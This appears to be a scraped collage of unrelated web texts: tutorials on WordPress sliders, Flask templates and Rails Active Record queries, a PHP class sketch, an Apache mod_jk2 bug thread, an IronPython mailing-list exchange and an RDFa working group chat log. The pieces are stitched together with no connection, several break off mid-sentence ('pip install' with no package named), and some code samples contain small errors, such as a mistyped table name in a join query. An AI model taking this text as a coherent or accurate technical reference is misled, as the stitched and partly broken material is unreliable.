We need to add two sliders: one for each of the two people. Go to Smooth Slider > Sliders and click on Create New Slider. I've called my two sliders 'Heide' and 'Iain' because those are the names of the people.
Sliders aren't just for images: you can use them to display text too. In this tutorial, you've learned how to set up two sliders using a custom post type. Next we'll add the styling to make our text look the way it should.
Welcome.
It offers a variety of features for managing email quickly and efficiently for your application:
In some cases, the attachments are large and cause time-outs when we try to POST the data to their servers. In other cases, there is a large volume of inbound email and customers would rather just run a GET request at some interval instead of having to handle multiple POSTs from us. Finally, it serves as redundancy in case their web service goes down and they can't accept our POSTs.
Often, for example, you might have:

A Contact_Information class that allows us to instantiate an object that includes all contact information for a person.

A Payment_Information class that allows us to maintain the credit card or debit card number for a person as well as other details associated with that payment method.
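As a sketch of that design (everything beyond the two class names is illustrative):

<?php

class Contact_Information {

    public $name;
    public $email;
    public $street_address;

    public function __construct( $name, $email, $street_address ) {
        $this->name           = $name;
        $this->email          = $email;
        $this->street_address = $street_address;
    }
}

class Payment_Information {

    private $card_number;
    private $expiration_date;

    public function __construct( $card_number, $expiration_date ) {
        $this->card_number     = $card_number;
        $this->expiration_date = $expiration_date;
    }

    public function get_card_number() {
        return $this->card_number;
    }
}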
Flask comes packaged with Jinja2, and hence we just need to install Flask. For this series, I recommend using the development version of Flask, which includes much more stable command line support among many other features and improvements to Flask in general.
pip install
In Flask, we can write a complete web application without the need of any third-party templating engine. Let's have a look at a small
Hello World app.
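A minimal sketch of such an app:

from flask import Flask

app = Flask(__name__)

@app.route('/')
def hello_world():
    return 'Hello World!'

if __name__ == '__main__':
    app.run()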
By default, Flask expects the templates to be placed in a folder named
templates at the application root level. Flask then automatically reads the contents by making this folder available for use with the
render_template() method. I will demonstrate the same by restructuring the trivial
Hello World application shown above.
The application structure would be as shown below.
flask_app/ my_app.py templates/ - index.html
from flask import Flask, render_template, request

app = Flask(__name__)

@app.route('/')
@app.route('/hello')
@app.route('/hello/<user>')
def hello_world(user=None):
    user = user or 'Shalabh'
    return render_template('index.html', user=user)
The last part of the URL after hello is passed to the view as the user argument. The Bootstrap files, including static/js/bootstrap.min.js, can be downloaded from the Bootstrap website mentioned above. The rest of the application code is demonstrated below: one view serves the purpose of listing all the products, and the other, product, opens up the individual page.
body {
  padding-top: 50px;
}

.top-pad {
  padding: 40px 15px;
  text-align: center;
}
This file holds a bit of custom CSS that I added to make the templates more legible. Let's look at the templates now.
<!DOCTYPE html>
<html lang="en">
  <head>
    <title>Flask Product Catalog</title>
    <link href="{{ url_for('static', filename='css/bootstrap.min.css') }}" rel="stylesheet">
    <link href="{{ url_for('static', filename='css/main.css') }}" rel="stylesheet">
  </head>
  <body>
    <div class="container">
      {% block container %}{% endblock %}
    </div>
    <script src="{{ url_for('static', filename='js/bootstrap.min.js') }}"></script>
  </body>
</html>
{% extends 'base.html' %}

{% block container %}
  <div class="top-pad">
    {% for id, product in products.iteritems() %}
      <div class="well">
        <h2>
          <a href="{{ url_for('product', key=id) }}">{{ product['name'] }}</a>
          <small>$ {{ product['price'] }}</small>
        </h2>
      </div>
    {% endfor %}
  </div>
{% endblock %}
See how this template extends
base.html and provides the contents of
{% block container %}.
{% for %} behaves just like a normal for loop in any language; we are using it here to create a list of products.
In this second article, we’ll dive a little deeper into Active Record queries in Rails. In case you are still new to SQL, I’ll add examples that are simple enough that you can tag along and pick up the syntax a bit as we go.
That being said, it would definitely help if you run through a quick SQL tutorial before you come back to continue to read. Otherwise, take your time to understand the SQL queries we used, and I hope that by the end of this series it won’t feel intimidating anymore.
Most of it is really straightforward, but the syntax is a bit weird if you just started out with coding—especially in Ruby. Hang in there, it’s no rocket science!
These queries include more than one database table to work with and might be the most important to take away from this article. It boils down to this: instead of doing multiple queries for information that is spread over multiple tables,
includes tries to keep these to a minimum. The key concept behind this is called “eager loading” and means that we are loading associated objects when we do a find.
If we did that by iterating over a collection of objects and then trying to access its associated records from another table, we would run into an issue that is called the “N + 1 query problem”. For example, for each
agent.handler in a collection of agents, we would fire separate queries for both agents and their handlers. That is what we need to avoid since this does not scale at all. Instead, we do the following:
agents = Agent.includes(:handlers)
If we now iterate over such a collection of agents—discounting that we haven't limited the number of records returned for now—we'll end up with two queries instead of possibly a gazillion.
SELECT "agents".* FROM "agents" SELECT "handlers".* FROM "handlers" WHERE "handlers"."id" IN (1, 2)
This one agent in the list has two handlers, and when we now ask the agent object for its handlers, no additional database queries need to be fired. We can take this a step further, of course, and eager load multiple associated table records. If we needed to load not only handlers but also the agent’s associated missions for whatever reason, we could use
includes like this.
agents = Agent.includes(:handlers, :mission)
Simple! Just be careful about using singular and plural versions for the includes. They depend on your model associations. A
has_many association uses plural, while a
belongs_to or a
has_one needs the singular version, of course. If you need, you can also tuck on a
where clause for specifying additional conditions, but the preferred way of specifying conditions for associated tables that are eager loaded is by using
joins instead.
One thing to keep in mind about eager loading is that the data that will be added on will be sent back in full to Active Record—which in turn builds Ruby objects including these attributes. This is in contrast to “simply” joining the data, where you will get a virtual result that you can use for calculations, for example, and will be less memory draining than includes.
Joining tables is another tool that lets you avoid sending too many unnecessary queries down the pipeline. A common scenario is joining two tables with a single query that returns some sort of combined record.
joins is just another finder method of Active Record that lets you—in SQL terms—
JOIN tables. These queries can return records combined from multiple tables, and you get a virtual table that combines records from these tables. This is pretty rad when you compare that to firing all kinds of queries for each table instead. There are a few different kinds of data overlap you can get with this approach.
The inner join is the default modus operandi for
joins. This matches all the results that match a certain id and its representation as a foreign key from another object or table. In the example below, put simply: give me all missions where the mission’s
id shows up as
mission_id in an agent’s table.
"agents"."mission_id" = "missions"."id". Inner joins exclude relationships that don’t exist.
Mission.joins(:agents)
SELECT "missions".* FROM "missions" INNER JOIN "agents" ON "agents"."mission_id" = "mission"."id"
So we are matching missions and their accompanying agents—in a single query! Sure, we could get the missions first, iterate over them one by one, and ask for their agents. But then we would go back to our dreadful “N + 1 query problem”. No, thank you!
What’s also nice about this approach is that we won’t get any nil cases with inner joins; we only get records returned that match their ids to foreign keys in associated tables. If we need to find missions, for example, that lack any agents, we would need an outer join instead. Since this currently involves writing your own
OUTER JOIN SQL, we will look into this in detail in the last article, but a quick preview doesn't hurt.
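Here is a sketch of that hand-written SQL in action, finding missions that have no agents at all, something an inner join can never return:

# Missions with no matching agents; the LEFT OUTER JOIN keeps them,
# and the nil check filters down to exactly those rows.
Mission.joins("LEFT OUTER JOIN agents ON agents.mission_id = missions.id").where(agents: { id: nil })

Back to standard joins, you can also join multiple associated tables, of course.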
Mission.joins(:agents, :expenses, :handlers)
And you can add onto these some
where clauses to specify your finders even more. Below, we are looking only for missions that are executed by James Bond and only the agents that belong to the mission 'Moonraker' in the second example.
Mission.joins(:agents).where( agents: { name: 'James Bond' })
SELECT "missions".* FROM "missions" INNER JOIN "agents" ON "agents"."mission_id" = "missions"."id" WHERE "agents"."name" = ? [["name", "James Bond"]]
Agent.joins(:mission).where( missions: { mission_name: 'Moonraker' })
SELECT "agents".* FROM "agents" INNER JOIN "missions" ON "missions"."id" = "agents"."mission_id" WHERE "missions"."mission_name" = ? [["mission_name", "Moonraker"]]
With
joins, you also have to pay attention to singular and plural use of your model associations. Because my
Mission class
has_many :agents, we can use the plural. On the other hand, for the
Agent class
belongs_to :mission, only the singular version works without blowing up. Important little detail: the
where part is simpler. Since you are scanning for multiple rows in the table that fulfill a certain condition, the plural form always makes sense.
Scopes are a handy way to extract common query needs into well-named methods of your own. That way they are a bit easier to pass around and also possibly easier to understand if others have to work with your code or if you need to revisit certain queries in the future. You can define them for single models but use them for their associations as well.
The sky is the limit really—
joins,
includes, and
where are all fair game! Since scopes also return
ActiveRecord::Relations objects, you can chain them and call other scopes on top of them without hesitation. Extracting scopes like that and chaining them for more complex queries is very handy and makes longer ones all the more readable. Scopes are defined via the “stabby lambda” syntax:
class Mission < ActiveRecord::Base
  has_many :agents

  scope :successful, -> { where(mission_complete: true) }
end

Mission.successful
class Agent < ActiveRecord::Base
  belongs_to :mission

  scope :licenced_to_kill, -> { where(licence_to_kill: true) }
  scope :womanizer,        -> { where(womanizer: true) }
  scope :gambler,          -> { where(gambler: true) }
end

# Agent.gambler
# Agent.womanizer
# Agent.licenced_to_kill
# Agent.womanizer.gambler

Agent.licenced_to_kill.womanizer.gambler
SELECT "agents".* FROM "agents" WHERE "agents"."licence_to_kill" = ? AND "agents"."womanizer" = ? AND "agents"."gambler" = ? [["licence_to_kill", "t"], ["womanizer", "t"], ["gambler", "t"]]
As you can see from the example above, finding James Bond is much nicer when you can just chain scopes together. That way you can mix and match various queries and stay DRY at the same time. If you need scopes via associations, they are at your disposal as well:
Mission.last.agents.licenced_to_kill.womanizer.gambler
SELECT "missions".* FROM "missions" ORDER BY "missions"."id" DESC LIMIT 1 SELECT "agents".* FROM "agents" WHERE "agents"."mission_id" = ? AND "agents"."licence_to_kill" = ? AND "agents"."womanizer" = ? AND "agents"."gambler" = ? [["mission_id", 33], ["licence_to_kill", "t"], ["womanizer", "t"], ["gambler", "t"]]
You can also redefine the
default_scope for when you are looking at something like
Mission.all.
class Mission < ActiveRecord::Base
  default_scope { where status: "In progress" }
end

Mission.all
SELECT "missions".* FROM "missions" WHERE "missions"."status" = ? [["status", "In progress"]]
This section is not so much advanced in terms of the understanding involved, but you will need them more often than not in scenarios that can be considered a bit more advanced than your average finder—like
.all,
.first,
.find_by_id or whatever. Filtering based on basic calculations, for example, is most likely something that newbies don’t get in touch with right away. What are we looking at exactly here?
sum
count
minimum
maximum
average
Easy peasy, right? The cool thing is that instead of looping through a returned collection of objects to do these calculations, we can let Active Record do all this work for us and return these results with the queries—in one query preferably. Nice, huh?
count
Mission.count # => 24
SELECT COUNT(*) FROM "missions"
average
Agent.average(:number_of_gadgets).to_f # => 3.5
SELECT AVG("agents"."number_of_gadgets") FROM "agents"
Since we now know how we can make use of
joins, we can take this one step further and only ask for the average of gadgets the agents have on a particular mission, for example.
Agent.joins(:mission).where(missions: {name: 'Moonraker'}).average(:number_of_gadgets).to_f # => 3.4
SELECT AVG("agents"."number_of_gadgets") FROM "agents" INNER JOIN "missions" ON "missions"."id" = "agents"."mission_id" WHERE "missions"."name" = ? [["name", "Moonraker"]]
Grouping these average number of gadgets by missions' names becomes trivial at that point. See more about grouping below:
Agent.joins(:mission).group('missions.name').average(:number_of_gadgets)
SELECT AVG("agents"."number_of_gadgets") AS average_number_of_gadgets, missions.name AS missions_name FROM "agents" INNER JOIN "missions" ON "missions"."id" = "agents"."mission_id" GROUP BY missions.name
sum
Agent.sum(:number_of_gadgets)
Agent.where(licence_to_kill: true).sum(:number_of_gadgets)
Agent.where.not(licence_to_kill: true).sum(:number_of_gadgets)
SELECT SUM("agents"."number_of_gadgets") FROM "agents"

SELECT SUM("agents"."number_of_gadgets") FROM "agents" WHERE "agents"."licence_to_kill" = ? [["licence_to_kill", "t"]]

SELECT SUM("agents"."number_of_gadgets") FROM "agents" WHERE ("agents"."licence_to_kill" != ?) [["licence_to_kill", "t"]]
maximum
Agent.maximum(:number_of_gadgets)
Agent.where(licence_to_kill: true).maximum(:number_of_gadgets)
SELECT MAX("agents"."number_of_gadgets") FROM "agents"

SELECT MAX("agents"."number_of_gadgets") FROM "agents" WHERE "agents"."licence_to_kill" = ? [["licence_to_kill", "t"]]
minimum
Agent.minimum(:iq)
Agent.where(licence_to_kill: true).minimum(:iq)
SELECT MIN("agents"."iq") FROM "agents"

SELECT MIN("agents"."iq") FROM "agents" WHERE "agents"."licence_to_kill" = ? [["licence_to_kill", "t"]]
All of these aggregation methods are not letting you chain on other stuff—they are terminal, so the order is important when you do calculations. We don't get an ActiveRecord::Relation object back from these operations, which makes the music stop at that point—we get a hash or numbers instead. The examples below won't work:
Agent.maximum(:number_of_gadgets).where(licence_to_kill: true)
Agent.sum(:number_of_gadgets).where.not(licence_to_kill: true)
Agent.joins(:mission).average(:number_of_gadgets).group('missions.name')
If you want the calculations broken down and sorted into logical groups, you should make use of a
GROUP clause and not do this in Ruby. What I mean by that is you should avoid iterating over a group which produces potentially tons of queries.
Agent.joins(:mission).group('missions.name').average(:number_of_gadgets) # => { "Moonraker"=> 4.4, "Octopussy"=> 4.9 }
SELECT AVG("agents"."number_of_gadgets") AS average_number_of_gadgets, missions.name AS missions_name FROM "agents" INNER JOIN "missions" ON "missions"."id" = "agents"."mission_id" GROUP BY missions.name
This example finds all the agents that are grouped to a particular mission and returns a hash with the calculated average number of gadgets as its values—in a single query! Yup! The same goes for the other calculations as well, of course. In this case, it really makes more sense to let SQL do the work. The number of queries we fire for these aggregations is just too important.
For every attribute on your models, say
name,
favorite_gadget and so on, Active Record lets you use very readable finder methods that are dynamically created for you. Sounds cryptic, I know, but it doesn’t mean anything other than
find_by_id or
find_by_favorite_gadget. The
find_by part is standard, and Active Record just tucks on the name of the attribute for you. You can even get to add an
! if you want that finder to raise an error if nothing can be found. The sick part is, you can even chain these dynamic finder methods together. Just like this:
Agent.find_by_name('James Bond')
Agent.find_by_name_and_licence_to_kill('James Bond', true)
SELECT "agents".* FROM "agents" WHERE "agents"."name" = ? LIMIT 1 [["name", "James Bond"]] SELECT "agents".* FROM "agents" WHERE "agents"."name" = ? AND "agents"."licence_to_kill" = ? LIMIT 1 [["name", "James Bond"], ["licence_to_kill", "t"]]
Of course you can go nuts with this, but I think it loses its charm and usefulness if you go beyond two attributes:
Agent.find_by_name_and_licence_to_kill_and_womanizer_and_gambler_and_number_of_gadgets('James Bond', true, true, true, 3)
SELECT "agents".* FROM "agents" WHERE "agents"."name" = ? AND "agents"."licence_to_kill" = ? AND "agents"."womanizer" = ? AND "agents"."gambler" = ? AND "agents"."number_of_gadgets" = ? LIMIT 1 [["name", "James Bond"], ["licence_to_kill", "t"], ["womanizer", "t"], ["gambler", "t"], ["number_of_gadgets", 3]]
In this example, it is nevertheless nice to see how it works under the hood. Every new
_and_ adds an SQL
AND operator to logically tie the attributes together. Overall, the main benefit of dynamic finders is readability—tucking on too many dynamic attributes loses that advantage quickly, though. I rarely use this, maybe mostly when I play around in the console, but it’s definitely good to know that Rails offers this neat little trickery.
Active Record gives you the option to return objects that are a bit more focused about the attributes they carry. Usually, if not specified otherwise, the query will ask for all the fields in a row via
* (
SELECT "agents".*), and then Active Record builds Ruby objects with the complete set of attributes. However, you can
select only specific fields that should be returned by the query and limit the number of attributes your Ruby objects need to “carry around”.
Agent.select("name") => #<ActiveRecord::Relation [#<Agent 7: nil, name: "James Bond">, #<Agent id: 8, name: "Q">, ...]>
SELECT "agents"."name" FROM "agents"
Agent.select("number, favorite_gadget") => #<ActiveRecord::Relation [#<Agent id: 7, number: '007', favorite_gadget: 'Walther PPK'>, #<Agent id: 8, name: "Q", favorite_gadget: 'Broom Radio'>, ... ]>
SELECT "agents"."number", "agents"."favorite_gadget" FROM "agents"
As you can see, the objects returned will just have the selected attributes, plus their ids of course—that is a given with any object. It makes no difference if you use strings, as above, or symbols—the query will be the same.
Agent.select(:number_of_kills) Agent.select(:name, :licence_to_kill)
A word of caution: if you try to access attributes on the object that you haven't selected in your query, you will receive a
MissingAttributeError. Since the
id will be automatically provided for you anyway, you can ask for the id without selecting it, though.
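A quick sketch of that behavior, using the same Agent model as above (this follows the article's claim that the id tags along):

agent = Agent.select(:name).first

agent.name             # => "James Bond"
agent.id               # => 7, provided without being selected
agent.favorite_gadget  # => raises ActiveModel::MissingAttributeError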
Last but not least, you can write your own custom SQL via
find_by_sql. If you are confident enough in your own SQL-Fu and need some custom calls to the database, this method might come in very handy at times. But this is another story. Just don’t forget to check for Active Record wrapper methods first and avoid reinventing the wheel where Rails tries to meet you more than halfway.
Agent.find_by_sql("SELECT * FROM agents") Agent.find_by_sql("SELECT name, licence_to_kill FROM agents")
Unsurprisingly, this results in:
SELECT * FROM agents SELECT name, licence_to_kill FROM agents
Since scopes and your own class methods can be used interchangeably for your custom finder needs, we can take this one step further for more complex SQL queries.
class Agent < ActiveRecord::Base ... def self.find_agent_names query = <<-SQL SELECT name FROM agents SQL self.find_by_sql(query) end end
We can write class methods that encapsulate the SQL inside a Here document. This lets us write multi-line strings in a very readable fashion and then store that SQL string inside a variable which we can reuse and pass into
find_by_sql. That way we don’t plaster tons of query code inside the method call. If you have more than one place to use this query, it’s DRY as well.
Since this is supposed to be newbie-friendly and not an SQL tutorial per se, I kept the example very minimalistic for a reason. The technique for way more complex queries is quite the same, though. It’s easy to imagine having a custom SQL query in there that stretches beyond ten lines of code.
Go as nuts as you need to—reasonably! It can be a life saver. A word about the syntax here. The
SQL part is just an identifier here to mark the beginning and end of the string. I bet you won’t need this method all that much—let’s hope! It definitely has its place, and Rails land wouldn’t be the same without it—in the rare cases that you will absolutely want to fine-tune your own SQL with it.
I hope you got a bit more comfortable writing queries and reading the dreaded ol’ raw SQL. Most of the topics we covered in this article are essential for writing queries that deal with more complex business logic. Take your time to understand these and play around a bit with queries in the console.
I’m pretty sure that when you leave tutorial land behind, sooner or later your Rails cred will rise significantly if you work on your first real-life projects and need to craft your own custom queries. If you are still a bit shy of the topic, I’d say simply have fun with it—it really is no rocket science!]]>
I have apache setup with:
DirectoryIndex index.jsp
I have mod_jk2 setup with:
[uri:/*.jsp]
The result is that requests for index.jsp, or for a directory with an index.jsp, are
properly forwarded to Tomcat. However, if I request a directory with no index.jsp
file in it that I want mod_autoindex to handle, then mod_jk2 still forwards
the request to Tomcat, which returns an error because there is no index file.
There needs to be support for forwarding using handlers, which would allow you
to properly configure a Files directive to handle them with a SetHandler.
Apache should be the one to figure out whether the file exists. Another symptom of
this same problem is requesting /foo.jsp where foo.jsp doesn't exist. Apache
should be the one returning a 404, not Tomcat.
I want Apache to be the one deciding what should be handled when I am using its
configuration directives. Using Location-style directives is a horrible idea
for such things as it is a security issue when you have various names that can
refer to the same file, eg. Windows. As the Apache documentation clearly
states, Location directives should not be used to control access to files on
disk but should only be used for true virtual namespaces.
This reads like an enhancement request to me.
I'm also seeing this problem.
Is there any idea on when this will be added/corrected?
How about any CVS code that resolves the problem?
Thanks
same problem here
This enhancement request has been transferred to Tomcat 5 because:
- TC4 and TC5 share the connectors
- TC4 is no longer being developed, only supported
As of November 15, 2004, JK2 is no longer supported. All bugs related to JK2
will be marked as WONTFIX. In its place, some of its features have been
backported to jk1. Most of those features will be seen in 1.2.7, which is
slated for release on November 30th, 2004.
Another alternative is the AJP addition to mod_proxy, which will be part of
Apache 2.
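As a rough illustration only (it assumes mod_proxy and mod_proxy_ajp are available, and that Tomcat's AJP connector listens on its default port 8009), the mod_proxy route looks something like:

LoadModule proxy_module modules/mod_proxy.so
LoadModule proxy_ajp_module modules/mod_proxy_ajp.so
ProxyPass /examples ajp://localhost:8009/examples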
For more information, see the Tomcat connectors docs at
More specifically, there seem to be four easy ways to execute a string of python code. The following code has the output listed below:

Console.WriteLine(ss.Engine.CreateScriptSourceFromString("__name__", SourceCodeKind.Expression).Execute(ss));
Console.WriteLine(ss.Engine.CreateScriptSourceFromString("__name__", SourceCodeKind.Expression).Execute());
Console.WriteLine(ss.Engine.Execute("__name__"));
Console.WriteLine(ss.Engine.Execute("__name__", ss));

Output:

__main__
__builtin__
<module>
<module>

On Nov 17, 2:26 pm, "jhow... at drawloop.com" <jhow... at drawloop.com> wrote:
> Thanks, that gives me at least something. Any idea why:
>
>     ss.Engine.Execute("__name__", ss);
>
> returns "<module>" but:
>
>     ss.Engine.CreateScriptSourceFromString("__name__",
>     SourceCodeKind.Expression).Execute(ss);
>
> returns "__main__"?
>
> On Nov 17, 2:12 pm, Dino Viehland <di... at microsoft.com> wrote:
>
> > I think you now want to do:
> >
> > PythonModule pm = new PythonModule();
> > ScriptEngine se = Python.CreateEngine();
> > PythonContext pc = (PythonContext) HostingHelpers.GetLanguageContext(se);
> > pc.PublishModule("__main__", pm);
> >
> > var modContext = new ModuleContext(pm, pc);
> >
> > ScriptScope ss = HostingHelpers.CreateScriptScope(se, modContext.GlobalScope);
> > ss.SetVariable("__name__", "__main__");
> > ss.SetVariable("__doc__", "");
> >
> > The change here is to create a ModuleContext which will let you then get the Scope.
> >
> > I agree this has gotten worse in 2.6 - I opened a bug a while ago to make working with
> > modules easier -.
> >
> > > -----Original Message-----
> > > From: users-boun... at lists.ironpython.com [mailto:users-boun... at lists.ironpython.com] On Behalf Of jhow... at drawloop.com
> > > Sent: Tuesday, November 17, 2009 2:02 PM
> > > To: us... at lists.ironpython.com
> > > Subject: Re: [IronPython] Embedded IronPython 2.6 Module Name
> > >
> > > I realize I'm replying rather late, but I just got to trying this
> > > again. This is something that really should be simple. Anytime a
> > > module is run from the ScriptEngine directly, I would expect the
> > > behavior to be running as "__main__" just as if I was running it from
> > > the command line using "ipy" or "python". Unfortunately, trying to
> > > create a module directly doesn't work as far as naming the module.
> > > Using the following code:
> > >
> > > PythonModule pm = new PythonModule();
> > > ScriptEngine se = Python.CreateEngine();
> > > PythonContext pc = (PythonContext) HostingHelpers.GetLanguageContext(se);
> > > pc.PublishModule("__main__", pm);
> > > ScriptScope ss = HostingHelpers.CreateScriptScope(se, new Microsoft.Scripting.Runtime.Scope(pm.Get__dict__()));
> > > ss.SetVariable("__name__", "__main__");
> > > ss.SetVariable("__doc__", "");
> > >
> > > doesn't work. There's no way to directly get the Scope from the
> > > PythonModule when working this way, as it's been marked as internal.
> > > Looking through the debugger, the _scope variable that actually holds
> > > the scope on the PythonModule object is null. I believe the old
> > > CreateModule way of doing this would have worked, but there's no way
> > > that I've found to do this now.
> > >
> > > At this point, I'm really not sure how 2.6 is being marked as a
> > > release candidate.
> > >
> > > On an unrelated note, I could, in IronPython 1.1.2, do the following
> > > code:
> > >
> > > _pyEngine.Execute("python code", _pyEngine.DefaultModule, args);
> > >
> > > where "args" is a Dictionary<string, object>, and have those arguments
> > > passed in to a function call or the like. Is there any way to do this
> > > using the new hosting engine?
> > >
> > > Thanks again.
> > >
> > > On Nov 6, 2:18 pm, Curt Hagenlocher <c... at hagenlocher.org> wrote:
> > > > It looks like you can just create the PythonModule directly now --
> > > > it's a public class with a public constructor.
> > > >
> > > > On Thu, Nov 5, 2009 at 12:14 PM, Jonathan Howard <jhow... at drawloop.com> wrote:
> > > > > Thanks for the help, Curt. Perhaps it's a problem with the latest RC?
> > > > > There is no "CreateModule" function on the PythonContext object.
> > > > >
> > > > > ~Jonathan
Chatlog 2010-06-17
From RDFa Working Group Wiki
See CommonScribe Control Panel, original RRSAgent log and preview nicely formatted version.
13:45:26 <RRSAgent> RRSAgent has joined #rdfa
13:45:26 <RRSAgent> logging to
13:45:56 <manu> trackbot, prepare telecon
13:45:58 <trackbot> RRSAgent, make logs world
13:46:00 <trackbot> Zakim, this will be 7332
13:46:00 <Zakim> ok, trackbot; I see SW_RDFa()10:00AM scheduled to start in 14 minutes
13:46:01 <trackbot> Meeting: RDFa Working Group Teleconference
13:46:01 <trackbot> Date: 17 June 2010
13:46:05 <manu> Agenda:
13:46:07 <manu> Chair: Manu
13:46:11 <manu> Scribe: Manu
13:46:19 <manu> scribenick: manu
13:47:51 <manu> Regrets: Ivan, Knud
13:48:50 <Steven> Steven has joined #rdfa
13:52:02 <Benjamin> Benjamin has joined #rdfa
13:57:48 <manu> Present: Manu, Steven, Benjamin, Toby, MarkB, Shane
14:00:15 <Zakim> SW_RDFa()10:00AM has now started
14:00:19 <Zakim> +[IPcaller]
14:00:20 <manu> zakim, I am IPCaller
14:00:21 <Zakim> ok, manu, I now associate you with [IPcaller]
14:00:27 <manu> zakim, who is on the call?
14:00:33 <markbirbeck> zakim, code?
14:00:38 <Zakim> On the phone I see [IPcaller]
14:00:38 <tinkster> tinkster has joined #rdfa
14:00:42 <Zakim> the conference code is 7332 (tel:+1.617.761.6200 tel:+33.4.89.06.34.99 tel:+44.117.370.6152), markbirbeck
14:01:54 <Zakim> +ShaneM
14:03:57 <Steven> zakim, dial steven-617
14:03:57 <Zakim> ok, Steven; the call is being made
14:04:01 <Zakim> +Steven
14:23:18 <manu> Topic: ISSUE-26: Error Reporting Mechanism (on Ivan)
14:23:29 <Steven> issue-26?
14:23:29 <trackbot> ISSUE-26 -- Do we need an error reporting mechanism for RDFa? -- open
14:23:29 <trackbot>
14:24:24 <Zakim> -[IPcaller]
14:24:59 <Zakim> +[IPcaller]
14:26:27 <markbirbeck> q+
14:26:38 <Steven> ack mark
14:27:05 <manu> Manu: This concerns two things... do we want an error reporting mechanism? if so, what does it look like?
14:27:27 <manu> Mark: Well, you say RDFa Processor, but we also have an RDFa API now. We may have to come at it from two directions.
14:27:46 <manu> Mark: We may want to have something about this in RDFa Core, but we may want to also have something in the RDFa API spec.
14:28:11 <manu> Mark: Perhaps we shouldn't put Events in RDFa Core... but maybe we want to spec Events in RDFa API.
14:28:29 <Benjamin> +1 to add events about errors or warnings in the RDFa API
14:29:10 <manu> Manu: Anyone opposed to having an error mechanism?
14:29:16 <manu> Steven: I think it would be useful to have.
14:29:40 <manu> PROPOSAL: RDFa should have a warning and error reporting mechanism.
14:29:49 <manu> Manu: +1
14:29:50 <markbirbeck> +1
14:29:53 <Benjamin> +1
14:30:07 <Steven> +1 depending on form
14:30:19 <tinkster> DataParser.parse(store, callback); /* callback is a function called back for each error. */
14:30:20 <ShaneM> +1
14:31:02 <tinkster> +1 API should; -1 for Core having one.
14:31:08 <manu> RESOLVED: RDFa should have a warning and error reporting mechanism.
14:32:02 <markbirbeck> @tinkster Yes, that's one option. I favour using DOM 2 Events myself, but maybe that just means that your 'callback' is an EventHandler object.
14:33:08 <manu> Manu: (explains current proposal)
14:33:20 <tinkster> A processor implementing RDFa but not the RDFa API might want to have a method of passing back errors to whatever invoked it, but what that method is seems beyond the scope of RDFa to me. The RDFa API seems the only place where we should get involved in how errors are reported back.
14:33:48 <Steven> Not sure if I agree
14:33:54 <Steven> having an error graph could work
14:34:16 <ShaneM> but RDF doesn't really define how to access alternate graphs?
14:34:28 <markbirbeck> @tinkster: I don't think there's anything wrong with defining an error graph in core. But definitely it shouldn't define behaviour like events. That's for the API.
14:34:47 <Steven> agree on that
14:35:20 <manu> Mark: Shane, I think that's true, but this can be processor-specific. All we're really saying is that we should define some RDF terminology to define what errors are... and that these are available to the processor in a certain way.
14:35:50 <Benjamin> q+ on asking What is the advantage of storing warning and errors instead of just raising them as events?
14:35:54 <manu> Shane: What if we define /something/ in the RDFa namespace that means error or warning, but they can be returned in the regular graph.
14:35:55 <markbirbeck> q+
14:35:58 <manu> ack benjamin
14:35:58 <Zakim> Benjamin, you wanted to comment on asking What is the advantage of storing warning and errors instead of just raising them as events?
14:36:09 <manu> Benjamin: I don't see the advantages of warnings and errors in the default graph.
14:36:30 <manu> ack mark
14:36:40 <ShaneM> remember that there are many processors that are not embedded in a web page - no event mechanism
14:36:56 <manu> Mark: There are two things going on here - whether we have triples that indicate warnings, that's one question; whether or not they're in the default graph is another question.
14:37:15 <Benjamin> @Shane, ok I see the point, but how do XML parsers solve this issue?
14:37:17 <manu> Mark: People are doing this in different ways at the moment... I don't think it should be in the default graph.
14:37:49 <ShaneM> okay - never mind
14:37:54 <Steven> Agree, bad idea to put them in the default graph
14:38:51 <manu> Manu: Let's move this discussion to the mailing list.
14:38:58 <manu> Topic: ISSUE-5: @datatype and rdf:XMLLiteral (on Toby)
14:39:05 <manu>
14:39:18 <tinkster> I don't think this is a controversial issue at all. Move to resolve immediately?
14:39:49 <tinkster>!
14:39:55 <markbirbeck> q+
14:40:07 <manu> Manu: (explains issue)
14:40:11 <tinkster> that exclamation mark shouldn't be there.
14:40:23 <manu> Mark: We may want to have a token for XMLLiteral.
14:41:21 <tinkster> Mark++ e.g. datatype="xml"
14:42:08 <markbirbeck> @tinkster: Actually, you're right...that's much better.:)
14:42:14 <ShaneM> ++ tinkster
14:42:24 <Steven> +1
14:42:26 <ShaneM> +1
14:42:36 <markbirbeck> +1
14:42:38 <Benjamin> +1
14:43:20 <manu> PROPOSAL: Add language to the RDFa Core specification that states that when a CURIE in a datatype is expanded, if it is the rdf:XMLLiteral datatype, generate an XMLLiteral.
14:43:57 <manu> PROPOSAL: Add language to the RDFa Core specification that states that when a CURIE in a datatype is expanded, if it is the RDF XMLLiteral URL, generate an XMLLiteral.
14:44:16 <manu> Manu: +1
14:44:20 <Steven> +1
14:44:21 <Benjamin> +1
14:44:23 <tinkster> +1
14:44:25 <markbirbeck> +1
14:44:32 <Steven> ZAKIM, WHO IS NOISY?
14:44:32 <ShaneM> +1
14:44:42 <Zakim> Steven, listening for 10 seconds I heard sound from the following: Benjamin (4%), Steven (8%), ShaneM.a (44%)
14:44:44 <manu> RESOLVED: Add language to the RDFa Core specification that states that when a CURIE in a datatype is expanded, if it is the RDF XMLLiteral URL, generate an XMLLiteral.
14:45:07 <Steven> zakim, who is noisy?
14:45:17 <Zakim> Steven, listening for 10 seconds I heard sound from the following: ShaneM.a (10%)
14:45:28 <ShaneM> zakim, mute me
14:45:28 <Zakim> ShaneM.a should now be muted
14:45:31 <Steven> zakim, mute shane temporarily
14:45:31 <Zakim> ShaneM.a was already muted, Steven
14:45:53 <ShaneM> zakim, unmute me
14:45:53 <Zakim> ShaneM.a should no longer be muted
14:45:55 <manu> Topic: ISSUE-20: Deep Processing of XMLLiterals (on Mark)
14:46:05 <Steven> issue-20?
14:46:05 <trackbot> ISSUE-20 -- XMLLiteral content isn't processed for RDFa attributes in RDFa 1.0 - should this change in RDFa 1.1? -- open
14:46:05 <trackbot>
14:46:39 <ShaneM> definitely not
14:46:40 <manu> Manu: (explains issue)
14:46:56 <Steven> I need a use case
14:46:59 <manu> Manu: Anybody want to change default behavior from RDFa 1.0 - extract triples from XML Literal
14:47:07 <tinkster> there are certainly good use cases.
14:47:07 <ShaneM> it would break compatibility in a dramatic manner.
14:47:39 <tinkster> it would break backcompat, so would need to be done with an explicit opt-in.
